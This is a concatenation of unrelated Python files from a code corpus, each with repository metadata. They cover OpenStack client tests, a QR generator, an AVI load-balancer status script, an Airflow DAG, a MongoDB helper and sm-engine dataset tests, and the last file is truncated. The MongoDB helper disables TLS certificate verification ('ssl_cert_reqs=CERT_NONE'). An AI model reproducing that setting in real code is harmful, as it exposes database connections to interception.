self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='internalURL')
self.client._extract_service_catalog(resources)
self.assertEqual(self.client.endpoint_url, 'internal')
# Test url that isn't found in the service catalog
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='privateURL')
self.assertRaises(exceptions.EndpointTypeNotFound,
self.client._extract_service_catalog,
resources)
def test_strip_credentials_from_log(self):
def verify_no_credentials(kwargs):
return ('REDACTED' in kwargs['body']) and (
self.client.password not in kwargs['body'])
def verify_credentials(body):
return 'REDACTED' not in body and self.client.password in body
self.mox.StubOutWithMock(self.client, "request")
self.mox.StubOutWithMock(utils, "http_log_req")
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
utils.http_log_req(mox.IgnoreArg(), mox.IgnoreArg(), mox.Func(
verify_no_credentials))
self.client.request(
mox.IsA(str), mox.IsA(str), body=mox.Func(verify_credentials),
headers=mox.IgnoreArg()
).AndReturn((res200, json.dumps(KS_TOKEN_RESULT)))
utils.http_log_req(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
self.client.request(
mox.IsA(str), mox.IsA(str), headers=mox.IsA(dict)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
class CLITestAuthKeystoneWithId(CLITestAuthKeystone):
# Auth Body expected when using tenant Id
auth_type = 'tenantId'
def setUp(self):
"""Prepare the test environment."""
super(CLITestAuthKeystoneWithId, self).setUp()
self.client = client.HTTPClient(username=USERNAME,
tenant_id=TENANT_ID,
password=PASSWORD,
auth_url=AUTH_URL,
region_name=REGION)
class CLITestAuthKeystoneWithIdandName(CLITestAuthKeystone):
    # Auth Body expected when both tenant Id and name are given (Id takes precedence)
auth_type = 'tenantId'
def setUp(self):
"""Prepare the test environment."""
super(CLITestAuthKeystoneWithIdandName, self).setUp()
self.client = client.HTTPClient(username=USERNAME,
tenant_id=TENANT_ID,
tenant_name=TENANT_NAME,
password=PASSWORD,
auth_url=AUTH_URL,
region_name=REGION)
| 1.421875 | 1 |
api/scripts/test/test_generate_promoter_terminator.py | IsaacLuo/webexe | 0 | 35972 | import subprocess
import pytest
import os
import json
import tools  # assumed local helper module providing get_sequence_hash (used below)
def test_call_generate_promoter_terminator():
print('')
process_result = subprocess.run(['python', 'generate_promoter_terminator.py', './test/1.gff.json', '500', '200'], \
capture_output=True)
assert process_result.returncode == 0
result_line = process_result.stdout.decode().splitlines()[-1]
result_obj = json.loads(result_line)
assert result_obj['type'] == 'result'
file_url = result_obj['data']['files'][0]['url']
assert file_url
with open(os.path.join('test', '1.gff.json')) as fp:
src_gff = json.load(fp)
with open(os.path.join('results', file_url)) as fp:
dst_gff = json.load(fp)
assert len(dst_gff['records']) > len(src_gff['records'])
#all sequence must have hash
for record in dst_gff['records']:
assert 'sequenceHash' in record
assert record['sequenceHash'] == tools.get_sequence_hash(dst_gff, record['chrName'], record['start'], record['end'], record['strand'])
os.remove(os.path.join('results', file_url))
| 1.3125 | 1 |
main.py | NawrasseDahman/Qr-Code-Generator | 1 | 36100 | import qrcode
# data example
data = "www.google.com"
# file name
file_name = "qrcode.png"
# generate qr code
img = qrcode.make(data=data)
# save generated qr code as img
img.save(file_name)
| 1.421875 | 1 |
config.py | outbreakdm/Dead-Matter-Discord-Bot-Player-Counter | 0 | 36228 | BOT_TOKEN = "<PASSWORD>"
SERVER_ADDRESS = ("192.168.3.11:7797", 27016)
| 0.07959 | 0 |
corehq/ex-submodules/casexml/apps/stock/tests/mock_consumption.py | akashkj/commcare-hq | 471 | 36356 | <gh_stars>100-1000
from datetime import datetime, timedelta
from dimagi.utils import parsing as dateparse
from casexml.apps.stock.consumption import (
ConsumptionConfiguration,
compute_daily_consumption_from_transactions,
)
to_ts = dateparse.json_format_datetime
now = datetime.utcnow()
def ago(days):
return now - timedelta(days=days)
# note that you must add inferred consumption transactions manually to txdata
def mock_consumption(txdata, window, params=None):
default_params = {'min_window': 0, 'min_periods': 0}
params = params or {}
default_params.update(params)
config = ConsumptionConfiguration(**default_params)
return compute_daily_consumption_from_transactions(
txdata,
ago(window),
config,
)
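# Usage sketch (the stock transaction schema is assumed, not shown here; as the
# comment above notes, txdata must already include any inferred consumption
# transactions):
# daily_rate = mock_consumption(txdata, window=60, params={'min_window': 30})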
| 1.054688 | 1 |
VS State and Virtual IP Info/avi_virtual_service_info.py | jagmeetsingh91/AviSDK-Scripts | 0 | 36484 | <filename>VS State and Virtual IP Info/avi_virtual_service_info.py
#!/usr/bin/env python
#
# Created on Nov 14, 2017
# @author: <EMAIL>, <EMAIL>
#
# AVISDK based Script to get the status and configuration information of the Virtual Services
#
# Requires AVISDK ("pip install avisdk") and PrettyTable ("pip install PrettyTable")
# Usage:- python avi_virtual_service_info.py -c <Controller-IP> -u <user-name> -p <password>
# Note:- This script works for Avi Controller version 17.1.1 onwards
import json
import argparse
from avi.sdk.avi_api import ApiSession
from requests.packages import urllib3
from prettytable import PrettyTable
from prettytable import ALL as ALL
urllib3.disable_warnings()
def get_vs_list(api, api_version):
vs_list = []
rsp = api.get('virtualservice', api_version=api_version)
for vs in rsp.json()['results']:
vs_list.append(vs['uuid'])
return vs_list
def get_vs_oper_info(api, api_version, vs_list):
oper_dict = {}
for vs in vs_list:
rsp = api.get('virtualservice-inventory/%s' % vs, api_version=api_version)
vs_data = rsp.json()
req_vs_data = { "state": vs_data['runtime']['oper_status']['state'], "name": vs_data['config']['name'],
"uuid": vs_data['config']['uuid'] }
i = 1
for vips in vs_data['config']['vip']:
req_vs_data["vip_"+str(i)] = vips
i = i+1
j = 1
for dns in vs_data['config']['dns_info']:
req_vs_data["dns_"+str(j)] = dns
j = j+1
if vs_data['runtime']['oper_status']['state'] in oper_dict.keys():
oper_dict[vs_data['runtime']['oper_status']['state']].append(req_vs_data)
else:
oper_dict[vs_data['runtime']['oper_status']['state']] = []
oper_dict[vs_data['runtime']['oper_status']['state']].append(req_vs_data)
return oper_dict
def main():
#Getting Required Args
parser = argparse.ArgumentParser(description="AVISDK based Script to get the status and configuration"+
" information of the Virtual Services")
parser.add_argument("-u", "--username", required=True, help="Login username")
parser.add_argument("-p", "--password", required=True, help="Login password")
parser.add_argument("-c", "--controller", required=True, help="Controller IP address")
parser.add_argument("-t", "--tenant", required=False, help="Tenant Name")
parser.add_argument("-a", "--api_version", required=False, help="Tenant Name")
args = parser.parse_args()
user = args.username
host = args.controller
    password = args.password
if args.tenant:
tenant=args.tenant
else:
tenant="*"
if args.api_version:
api_version=args.api_version
else:
api_version="17.1.1"
#Getting API session for the intended Controller.
api = ApiSession.get_session(host, user, password, tenant=tenant, api_version=api_version)
#Getting the list of VirtualService(s).
vs_list = get_vs_list(api, api_version)
#Getting VS information
oper_dict = get_vs_oper_info(api, api_version, vs_list)
#print "Final Oper Dict:" + str(oper_dict)
for state, vs in oper_dict.iteritems():
print("VS in State:%s [%s]" % (state, len(vs)))
table = PrettyTable(hrules=ALL)
table.field_names = ["VS Name","VIP_ID", "VIP_Address", "DNS_INFO"]
for vss in vs:
vips = list()
dns_info = list()
vip_count = 0
dns_count = 0
if 'vip_1' in vss.keys():
vips = [value for key, value in vss.iteritems() if 'vip' in key.lower()]
vip_count = len(vips)
if 'dns_1' in vss.keys():
dns_info = [value for key, value in vss.iteritems() if 'dns' in key.lower()]
dns_count = len(dns_info)
vs_name = vss['name']
vip_ids = ''
vips_list = ''
dns_list = ''
for vip in vips:
vip_ids += vip['vip_id'] + "\n"
vips_list += vip['ip_address']['addr']
if vip.get('floating_ip', None):
vips_list += '- ' + vip['floating_ip']['addr']
vips_list+='\n'
for dns in dns_info:
dns_list += dns['fqdn'] + "\n"
table.add_row([vs_name, vip_ids[:-1], vips_list[:-1], dns_list[:-1]])
        print(table)
        print("\n")
if __name__ == "__main__":
main()
| 1.398438 | 1 |
5 kyu/Memoized Fibonacci.py | mwk0408/codewars_solutions | 6 | 36612 | def fibonacci(n, res=[0,1]):
    # The mutable default list doubles as a cross-call memo cache: res[i]
    # holds the i-th Fibonacci number and grows as larger n values are requested.
    if len(res) <= n:
        res.append(fibonacci(n-1) + fibonacci(n-2))
return res[n] | 2.28125 | 2 |
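# Quick check of the memoised behaviour (values are standard Fibonacci numbers):
# fibonacci(10)  # -> 55, filling the shared res list up to index 10
# fibonacci(9)   # -> 34, answered straight from the cached list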
plantcv/plantcv/hist_equalization.py | Howzit123/plantcv | 2 | 36740 | <filename>plantcv/plantcv/hist_equalization.py
# Histogram equalization
import cv2
import numpy as np
import os
from plantcv.plantcv import print_image
from plantcv.plantcv import plot_image
from plantcv.plantcv import fatal_error
from plantcv.plantcv import params
def hist_equalization(gray_img):
"""Histogram equalization is a method to normalize the distribution of intensity values. If the image has low
contrast it will make it easier to threshold.
Inputs:
gray_img = Grayscale image data
Returns:
img_eh = normalized image
:param gray_img: numpy.ndarray
:return img_eh: numpy.ndarray
"""
if len(np.shape(gray_img)) == 3:
fatal_error("Input image must be gray")
img_eh = cv2.equalizeHist(gray_img)
params.device += 1
if params.debug == 'print':
print_image(img_eh, os.path.join(params.debug_outdir, str(params.device) + '_hist_equal_img.png'))
elif params.debug == 'plot':
plot_image(img_eh, cmap='gray')
return img_eh
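# Usage sketch (file name is hypothetical; any single-channel 8-bit image works):
# gray = cv2.imread('low_contrast_leaf.png', cv2.IMREAD_GRAYSCALE)
# equalized = hist_equalization(gray)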
| 2.5625 | 3 |
lukkari/timerange.py | JuEeHa/lukkari | 0 | 36868 | import datetime
class Timerange:
def __init__(self, start, length):
self.start = start
self.length = length
def range(self):
end = self.start + self.length
return (self.start, end)
def __contains__(self, day):
delta = day - self.start
return datetime.timedelta(seconds = 0) <= delta and delta < self.length
def overlaps(self, other):
if other.start < self.start:
return other.overlaps(self)
assert(self.start <= other.start)
return other.start < self.start + self.length
def __repr__(self):
return 'Timerange(%s, %s)' % (repr(self.start), repr(self.length))
def __str__(self):
start, end = (i.strftime('%H:%M') for i in self.range())
return '%s - %s' % (start, end)
def __eq__(self, other):
return self.start == other.start and self.length == other.length
def __ne__(self, other):
return not self == other
def between(start, end):
assert(len(start) == 2 and len(end) == 2)
start_hour, start_minute = start
end_hour, end_minute = end
start_obj = datetime.datetime(1970, 1, 1, start_hour, start_minute)
end_obj = datetime.datetime(1970, 1, 1, end_hour, end_minute)
assert(end_obj - start_obj > datetime.timedelta(seconds = 0))
return Timerange(start_obj, end_obj - start_obj)
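# Usage sketch (times are arbitrary examples):
# morning = between((9, 0), (11, 30))
# lecture = between((11, 0), (12, 0))
# morning.overlaps(lecture)  # -> True, they share 11:00-11:30
# datetime.datetime(1970, 1, 1, 10, 15) in morning  # -> True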
| 2.59375 | 3 |
fst_lookup/fallback_data.py | eddieantonio/fst-lookup | 5 | 36996 | <gh_stars>1-10
"""
Fallback data types, implemented in Python, for platforms that cannot build
the C extension.
"""
from .symbol import Symbol
from .typedefs import StateID
class Arc:
"""
An arc (transition) in the FST.
"""
__slots__ = ("_state", "_upper", "_lower", "_destination")
def __init__(
self, state: StateID, upper: Symbol, lower: Symbol, destination: StateID
) -> None:
self._state = state
self._upper = upper
self._lower = lower
self._destination = destination
@property
def state(self) -> int:
return self._state
@property
def upper(self) -> Symbol:
return self._upper
@property
def lower(self) -> Symbol:
return self._lower
@property
def destination(self) -> int:
return self._destination
def __eq__(self, other) -> bool:
if not isinstance(other, Arc):
return False
return (
self._state == other._state
and self._upper == other._upper
and self._lower == other._lower
and self._destination == other._destination
)
def __hash__(self) -> int:
return self._state + (hash(self._upper) ^ hash(self._lower))
def __str__(self) -> str:
if self._upper == self._lower:
label = str(self._upper)
else:
label = str(self._upper) + ":" + str(self._lower)
return "{:d} -{:s}-> {:d}".format(self._state, label, self._destination)
| 2.203125 | 2 |
singletons/mail.py | kwestpharedhat/quay | 0 | 37124 | from flask_mail import Mail
from singletons.app import _app
mail = Mail(_app)
| 0.59375 | 1 |
octostore/mongo_helper.py | luzhang06/octostore | 1 | 37252 | <gh_stars>1-10
from pymongo import MongoClient
import os
import sys
from pathlib import Path
from environs import Env
sys.path.append("..")
sys.path.append(str(Path(__file__).parent.resolve()))
class MongoHelpers:
_client = None
_db = None
_collection = None
def __init__(self, connection_uri=None, db_name=None):
env = Env()
env.read_env()
if db_name is None:
db_name = os.getenv("MONGO_DB")
if connection_uri is None:
host = os.getenv("MONGO_HOST")
port = os.getenv("MONGO_PORT")
username = os.getenv("MONGO_USERNAME")
            password = os.getenv("MONGO_PASSWORD")
args = "ssl=true&retrywrites=false&ssl_cert_reqs=CERT_NONE"
connection_uri = (
f"mongodb://{username}:{password}@{host}:{port}/{db_name}?{args}"
)
        # Bind the client and database to the underscore attributes declared above.
        self._client = MongoClient(connection_uri)
        self._db = self._client[db_name]
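    # Usage sketch: with MONGO_HOST, MONGO_PORT, MONGO_USERNAME, MONGO_PASSWORD
    # and MONGO_DB set in the environment (or a .env file read by environs),
    # construction needs no arguments:
    #   helper = MongoHelpers()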
# def create_experiment(self, name, artifact_location=None, tags=[]):
# # all_experiments = self.get_all_experiments()
# # Get all existing experiments and find the one with largest numerical ID.
# # len(list_all(..)) would not work when experiments are deleted.
# # experiments_ids = [
# # int(e.experiment_id)
# # for e in self.list_experiments(ViewType.ALL)
# # if e.experiment_id.isdigit()
# # ]
# experiment_id = self._get_highest_experiment_id() + 1
# return self._create_experiment_with_id(
# name, str(experiment_id), artifact_location, tags
# )
# def _create_experiment_with_id(
# self,
# experiment_name,
# experiment_id,
# artifact_location,
# lifecycle_stage: LifecycleStage = LifecycleStage.ACTIVE,
# tags=[],
# ) -> int:
# e = Experiment(
# experiment_id,
# experiment_name,
# experiment_id,
# artifact_location,
# lifecycle_stage,
# tags,
# )
# def _get_highest_experiment_id(self):
# if len(list(self._client.experiments.find())) is not 0:
# last_experiment = list(
# self.db.experiments.find({}).sort("experiment_id", -1).limit(1)
# )
# return last_experiment[0]["experiment_id"]
# else:
# return 0
# def list_experiments(self, view_type=ViewType.ACTIVE_ONLY):
# rsl = []
# if view_type == ViewType.ACTIVE_ONLY or view_type == ViewType.ALL:
# rsl += self._get_active_experiments(full_path=False)
# if view_type == ViewType.DELETED_ONLY or view_type == ViewType.ALL:
# # rsl += self._get_deleted_experiments(full_path=False)
# pass
# experiments = []
# for exp_id in rsl:
# try:
# # trap and warn known issues, will raise unexpected exceptions to caller
# experiment = self._get_experiment(exp_id, view_type)
# if experiment:
# experiments.append(experiment)
# except MissingConfigException as rnfe:
# # Trap malformed experiments and log warnings.
# logging.warning(
# "Malformed experiment '%s'. Detailed error %s",
# str(exp_id),
# str(rnfe),
# exc_info=True,
# )
# return experiments
# def _get_active_experiments(self, full_path=False):
# active_experiments_query = {
# "type": "experiment",
# "experiment_state": LifecycleStage.ACTIVE,
# }
# all_experiments = self.db.experiments.find(active_experiments_query)
# # exp_list = list_subdirs(self.root_directory, full_path)
# # return [exp for exp in exp_list if not exp.endswith(FileStore.TRASH_FOLDER_NAME)]
# def _get_deleted_experiments(self, full_path=False):
# # return list_subdirs(self.trash_folder, full_path)
# raise NotImplementedError("get_deleted_experiments")
| 2.328125 | 2 |
Chapter05/airflow/dags/classification_pipeline_dag.py | arifmudi/Machine-Learning-Engineering-with-Python | 67 | 37380 | <reponame>arifmudi/Machine-Learning-Engineering-with-Python
from datetime import timedelta
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.utils.dates import days_ago
default_args = {
'owner': '<NAME>',
'depends_on_past': False,
'start_date': days_ago(2),
'email': ['<EMAIL>'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=2),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
# 'wait_for_downstream': False,
# 'dag': dag,
# 'sla': timedelta(hours=2),
# 'execution_timeout': timedelta(seconds=300),
# 'on_failure_callback': some_function,
# 'on_success_callback': some_other_function,
# 'on_retry_callback': another_function,
# 'sla_miss_callback': yet_another_function,
# 'trigger_rule': 'all_success'
}
#instantiate DAG
dag = DAG(
'classification_pipeline',
default_args=default_args,
    description='Basic pipeline for classifying the Wine Dataset',
schedule_interval=timedelta(days=1), # run daily? check
)
get_data = BashOperator(
task_id='get_data',
bash_command='python3 /usr/local/airflow/scripts/get_data.py',
dag=dag,
)
train_model= BashOperator(
task_id='train_model',
depends_on_past=False,
bash_command='python3 /usr/local/airflow/scripts/train_model.py',
retries=3,
dag=dag,
)
# Persist to MLFlow
persist_model = BashOperator(
task_id='persist_model',
depends_on_past=False,
    bash_command='python ……./persist_model.py',
retries=3,
dag=dag,
)
get_data >> train_model >> persist_model
| 1.523438 | 2 |
oro_plugins/migrations/0002_galleryitem_gallery.py | mikeh74/orocus_djangocms | 0 | 37508 | <gh_stars>0
# Generated by Django 3.0.6 on 2020-06-05 20:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('oro_plugins', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='galleryitem',
name='gallery',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='oro_plugins.Gallery', verbose_name=''),
preserve_default=False,
),
]
| 0.894531 | 1 |
common/db.py | levinster82/GaragePi | 34 | 37636 | import os
from sqlite3 import dbapi2 as sqlite3
class GarageDb:
def __init__(self, instance_path, resource_path):
self.db_file = os.path.join(instance_path, 'history.db')
self.init_file = os.path.join(resource_path, 'schema.sql')
# Run init script to ensure database structure
conn = self.get_connection()
with open(self.init_file, mode='r') as f:
conn.cursor().executescript(f.read())
conn.commit()
conn.close()
def get_connection(self):
rv = sqlite3.connect(self.db_file)
rv.row_factory = sqlite3.Row
return rv
def record_event(self, user_agent: str, login: str, event: str, description: str):
conn = self.get_connection()
conn.execute('insert into entries (UserAgent, Login, Event, Description) values (?, ?, ?, ?)',
[user_agent, login, event, description])
conn.commit()
conn.close()
def read_history(self):
conn = self.get_connection()
cur = conn.execute('select datetime(timestamp, \'localtime\') as timestamp, event, description from entries order by timestamp desc')
records = cur.fetchmany(500)
conn.close()
return records
def read_full_history(self):
conn = self.get_connection()
cur = conn.execute('select datetime(timestamp, \'localtime\') as timestamp, event, description from entries order by timestamp desc')
records = cur.fetchall()
conn.close()
return records
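# Usage sketch (paths are hypothetical; schema.sql must live under resource_path):
# db = GarageDb('/var/lib/garagepi', '/opt/garagepi/resources')
# db.record_event('test-agent', 'admin', 'open', 'Door opened from a test script')
# print(db.read_history()[0]['event'])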
| 1.859375 | 2 |
bot/migrators/config_migrator.py | yukie-nobuharu/TTMediaBot | 0 | 37764 | <filename>bot/migrators/config_migrator.py
import sys
from bot.config import ConfigManager, config_data_type
def to_v1(config_data: config_data_type) -> config_data_type:
return update_version(config_data, 1)
migrate_functs = {1: to_v1}
def migrate(
config_manager: ConfigManager,
config_data: config_data_type,
) -> config_data_type:
if "config_version" not in config_data:
        config_data = update_version(config_data, 0)
elif (
not isinstance(config_data["config_version"], int)
or config_data["config_version"] > config_manager.version
):
sys.exit("Error: invalid config_version value")
elif config_data["config_version"] == config_manager.version:
return config_data
else:
for ver in migrate_functs:
if ver > config_data["config_version"]:
config_data = migrate_functs[ver](config_data)
config_manager._dump(config_data)
return config_data
def update_version(config_data: config_data_type, version: int) -> config_data_type:
_config_data = {"config_version": version}
_config_data.update(config_data)
return _config_data
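# Sketch of a later migration step (the migrated field is hypothetical):
# def to_v2(config_data: config_data_type) -> config_data_type:
#     config_data.setdefault("new_option", False)
#     return update_version(config_data, 2)
# migrate_functs[2] = to_v2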
| 1.5 | 2 |
Fundamentos/variables.py | ijchavez/python | 0 | 37892 | <filename>Fundamentos/variables.py
x = 5
y = 3
z = x + y
print(x)
print(y)
print(x + y)
print(z)
w = z
print(w) | 0.714844 | 1 |
scripts/distribution.py | Qi-max/amlearn | 12 | 38020 | <reponame>Qi-max/amlearn
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
__author__ = "<NAME>"
__email__ = "<EMAIL>"
def column_hist(data, bins=None, density=True, fraction=True,
save_figure_to_dir=None, save_data_to_dir=None, fmt=None,
ylim=None, yscale=None):
bins = 20 if bins is None else bins
fmt = '%.10e' if fmt is None else fmt
hist, edge = np.histogram(data, bins=bins, density=density)
if density is False:
if fraction:
hist = hist/hist.sum()
if save_figure_to_dir:
plt.figure(figsize=(6, 6))
# alpha gives transparency
plt.plot(edge[1:], hist, 'r--o', alpha=0.5, linewidth=1.0)
if ylim:
plt.ylim(*ylim)
if yscale:
plt.yscale(yscale)
plt.savefig(save_figure_to_dir, dpi=100, bbox_inches='tight')
plt.close()
if save_data_to_dir:
np.savetxt(save_data_to_dir, list(zip(edge[1:], hist)), fmt=fmt)
if __name__ == "__main__":
system = ["Cu65Zr35", "qr_5plus10^10"]
prediction_file = "xx"
output_path = "xxx"
output_file_header = r'{}_{}_QS'.format(*system)
qs_col = "QS_predict"
bin = 0.02
df = pd.read_csv(prediction_file, index_col=0)
column_hist(df[qs_col], bins=np.arange(0, 1.0, bin), density=True,
save_figure_to_dir=os.path.join(output_path, "{}_density_bin_{}.png".format(output_file_header, bin)),
save_data_to_dir=os.path.join(output_path, "{}_density_bin_{}.csv".format(output_file_header, bin)),
fmt=["%.2f", '%.10e'])
column_hist(df[qs_col], bins=np.arange(0, 1.0, bin), density=False,
save_figure_to_dir=os.path.join(output_path, "{}_fraction_bin_{}.png".format(output_file_header, bin)),
save_data_to_dir=os.path.join(output_path, "{}_fraction_bin_{}.csv".format(output_file_header, bin)),
ylim=(0, 0.05),
fmt=["%.2f", '%.10e'])
column_hist(df[qs_col], bins=np.arange(0, 1.0, bin), density=False,
save_figure_to_dir=os.path.join(output_path, "{}_fraction_bin_{}_log.png".format(output_file_header, bin)),
save_data_to_dir=os.path.join(output_path, "{}_fraction_bin_{}_log.csv".format(output_file_header, bin)),
ylim=(0.0001, 0.05), yscale="log",
fmt=["%.2f", '%.10e'])
| 2.265625 | 2 |
tests/test_dataset_manager.py | METASPACE2020/sm-engine | 3 | 38148 | from unittest.mock import patch, MagicMock, call
import json
from datetime import datetime
from copy import deepcopy
import pytest
from PIL import Image
from sm.engine import DB, ESExporter, QueuePublisher
from sm.engine.dataset_manager import SMapiDatasetManager, SMDaemonDatasetManager
from sm.engine.dataset_manager import Dataset, DatasetActionPriority, DatasetAction, DatasetStatus
from sm.engine.errors import DSIDExists
from sm.engine.queue import SM_ANNOTATE, SM_DS_STATUS
from sm.engine.tests.util import pysparkling_context, sm_config, ds_config, test_db
from sm.engine.png_generator import ImageStoreServiceWrapper
@pytest.fixture()
def fill_db(test_db, sm_config, ds_config):
upload_dt = '2000-01-01 00:00:00'
ds_id = '2000-01-01'
meta = {"meta": "data"}
db = DB(sm_config['db'])
db.insert('INSERT INTO dataset (id, name, input_path, upload_dt, metadata, config, '
'status, is_public, mol_dbs, adducts) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
rows=[(ds_id, 'ds_name', 'input_path', upload_dt,
json.dumps(meta), json.dumps(ds_config), DatasetStatus.FINISHED,
True, ['HMDB-v4'], ['+H'])])
db.insert("INSERT INTO job (id, db_id, ds_id) VALUES (%s, %s, %s)",
rows=[(0, 0, ds_id)])
db.insert("INSERT INTO sum_formula (id, db_id, sf) VALUES (%s, %s, %s)",
rows=[(1, 0, 'H2O')])
db.insert(("INSERT INTO iso_image_metrics (job_id, db_id, sf, adduct, iso_image_ids) "
"VALUES (%s, %s, %s, %s, %s)"),
rows=[(0, 0, 'H2O', '+H', ['iso_image_1_id', 'iso_image_2_id'])])
db.close()
def create_ds_man(sm_config, db=None, es=None, img_store=None,
action_queue=None, status_queue=None, sm_api=False):
db = db or DB(sm_config['db'])
es_mock = es or MagicMock(spec=ESExporter)
action_queue_mock = action_queue or MagicMock(QueuePublisher)
status_queue_mock = status_queue or MagicMock(QueuePublisher)
img_store_mock = img_store or MagicMock(spec=ImageStoreServiceWrapper)
if sm_api:
return SMapiDatasetManager(db=db, es=es_mock,
mode='queue', image_store=img_store_mock,
action_queue=action_queue_mock, status_queue=status_queue_mock)
else:
return SMDaemonDatasetManager(db=db, es=es_mock,
img_store=img_store_mock, mode=None,
status_queue=status_queue_mock)
def create_ds(ds_id='2000-01-01', ds_name='ds_name', input_path='input_path', upload_dt=None,
metadata=None, ds_config=None, status=DatasetStatus.NEW, mol_dbs=None, adducts=None):
upload_dt = upload_dt or datetime.now()
if not mol_dbs:
mol_dbs = ['HMDB-v4']
if not adducts:
adducts = ['+H', '+Na', '+K']
return Dataset(ds_id, ds_name, input_path, upload_dt, metadata or {}, ds_config or {},
status=status, mol_dbs=mol_dbs, adducts=adducts, img_storage_type='fs')
class TestSMapiDatasetManager:
def test_add_new_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.add(ds, priority=DatasetActionPriority.HIGH)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.ADD, 'del_first': False}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
def test_delete_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.delete(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path', 'action': DatasetAction.DELETE}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
def test_update_ds__configs_equal_metadata_diff(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds.metadata = {'new': 'metadata'}
ds_man.update(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.UPDATE}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
def test_update_ds__configs_metadata_equal__do_nothing(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.update(ds)
action_queue_mock.assert_not_called()
def test_add_ds__new_mol_db(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds.config['databases'] = [{'name': 'HMDB'}, {'name': 'ChEBI'}]
ds_man.add(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.ADD, 'del_first': False}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.DEFAULT)])
def test_add_optical_image(self, fill_db, sm_config, ds_config):
db = DB(sm_config['db'])
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
img_store_mock = MagicMock(ImageStoreServiceWrapper)
img_store_mock.post_image.side_effect = ['opt_img_id1', 'opt_img_id2', 'opt_img_id3', 'thumbnail_id']
img_store_mock.get_image_by_id.return_value = Image.new('RGB', (100, 100))
ds_man = create_ds_man(sm_config=sm_config, db=db, es=es_mock,
img_store=img_store_mock, action_queue=action_queue_mock, sm_api=True)
ds_man._annotation_image_shape = MagicMock(return_value=(100, 100))
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
zoom_levels = [1, 2, 3]
raw_img_id = 'raw_opt_img_id'
ds_man.add_optical_image(ds, raw_img_id, [[1, 0, 0], [0, 1, 0], [0, 0, 1]],
zoom_levels=zoom_levels)
assert db.select('SELECT * FROM optical_image') == [
('opt_img_id{}'.format(i + 1), ds.id, zoom)
for i, zoom in enumerate(zoom_levels)]
assert db.select('SELECT optical_image FROM dataset where id = %s', params=(ds_id,)) == [(raw_img_id,)]
assert db.select('SELECT thumbnail FROM dataset where id = %s', params=(ds_id,)) == [('thumbnail_id',)]
class TestSMDaemonDatasetManager:
class SearchJob:
def __init__(self, *args, **kwargs):
pass
def run(self, *args, **kwargs):
pass
def test_add_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
db = DB(sm_config['db'])
try:
ds_man = create_ds_man(sm_config, db=db, es=es_mock, action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
ds_name = 'ds_name'
input_path = 'input_path'
upload_dt = datetime.now()
metadata = {}
ds = create_ds(ds_id=ds_id, ds_name=ds_name, input_path=input_path, upload_dt=upload_dt,
metadata=metadata, ds_config=ds_config)
ds_man.add(ds, search_job_factory=self.SearchJob)
DS_SEL = 'select name, input_path, upload_dt, metadata, config from dataset where id=%s'
assert db.select_one(DS_SEL, params=(ds_id,)) == (ds_name, input_path, upload_dt, metadata, ds_config)
finally:
db.close()
def test_update_ds(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
ds_man = create_ds_man(sm_config, es=es_mock, action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
